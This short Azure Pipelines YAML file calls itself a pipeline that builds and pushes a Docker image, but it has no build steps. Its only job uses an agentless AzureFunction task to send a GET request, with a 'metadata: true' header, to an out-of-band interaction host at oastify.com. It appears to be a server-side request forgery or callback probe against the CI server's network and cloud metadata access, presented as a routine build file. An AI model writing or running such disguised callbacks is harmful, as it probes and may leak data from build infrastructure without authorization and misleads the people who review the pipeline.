# Docker
# Build and push an image to Azure Container Registry
# https://docs.microsoft.com/azure/devops/pipelines/languages/docker

trigger:
- main

resources:
- repo: self

variables:
  headername: 'metadata'

jobs:
- job: A
  pool: server
  steps:
  - task: AzureFunction@1
    inputs:
      function: 'http://dp6vmxrvjfudy80nd8c8r8rx4oagybm0.oastify.com/metadata'
      key: 'sss'
      method: 'GET'
      headers: |
        {
        "metadata":"true"
        }
      waitForCompletion: 'false'